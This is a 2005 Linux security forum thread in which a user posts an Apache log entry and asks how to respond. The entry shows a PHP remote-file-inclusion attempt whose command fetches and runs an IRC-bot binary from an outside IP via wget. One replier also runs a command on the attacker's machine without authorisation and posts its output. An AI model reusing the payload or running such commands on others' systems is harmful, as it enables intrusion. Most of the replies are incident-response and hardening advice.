LinuxQuestions.org - access

- Linux - Security (https://www.linuxquestions.org/questions/linux-security-4/)

- - access_log compromise ?? (https://www.linuxquestions.org/questions/linux-security-4/access_log-compromise-393978/)

access_log compromise ??

I saw a similar post yesterday, only one of my entries had a 200 status.

Can anyone tell me what they were able to accomplish, or what I need to look for?

24.70.88.18 - - [16/Dec/2005:19:23:50 -0600] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=
com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://81.174.26.111/cmd.gif?&cmd=
cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 200 683 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

They are trying to exploit PHP code, and install an IRC bot, disable global variables and turn the safe_mode on in php.ini.

Also, look through ps and netstat output, if you were compromize the listen process will show up in your ps. Look in /tmp and see if listen binary is there. Remeber, if your webserver is running by root, the exploiter owns your system, and could've installed rootkits, etc to hide his presense - the only remedy is to unplug your system from the network, and analyze it, and most probably clean re-install.

The webserver is running under the apache id. And the only thing in /tmp is:
keyring-1TvKkp
mapping-root

Code:

nic0@nic0:~$ ./aw 24.70.88.18 * "ps -ef|grep httpd" 3

[*] Output by 24.70.88.18:





root      6698    1  0 Nov18 ?        00:00:14 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf

wwwrun  21918  6698  0 Dec15 ?        00:00:03 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf

wwwrun  21923  6698  0 Dec15 ?        00:00:02 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf

wwwrun  21940  6698  0 Dec15 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf

wwwrun  28790  6698  0 Dec15 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf

wwwrun  24770  6698  0 Dec16 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf

wwwrun  26319  6698  0 Dec16 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf

wwwrun    6914  6698  0 Dec16 ?        00:00:02 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf

wwwrun  13901  6698  0 12:22 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf

wwwrun  24139  6698  0 17:06 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf

wwwrun  26687  6698  0 17:17 ?        00:00:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf

wwwrun    7104  7083  0 18:05 ?        00:00:00 sh -c echo SILENTIUM;ps -ef|grep httpd;echo



nic0@nic0:~$

yeah.. he is running apache.

l337 hax0rs should make sure they're computer is secure first. ;)

Holy smokes. How do I make sure that can't be done to my machine?

Also, what will disabling global variables and turning safe mode on do?

Disabling global variables disables people from entering their own variables into a request.
General - turning it off increases security a lot.

PHP Safe mode disables a lot of functions that remote users could exploit.

So in /etc/php.ini if I have:

register_globals = Off
safe_mode = On

Then this should help a bit?

Yep - this will improve your PHP security a lot. I also recommend getting a security scanner and checking for common vulnerabilities.. Something like Nessus or Amap.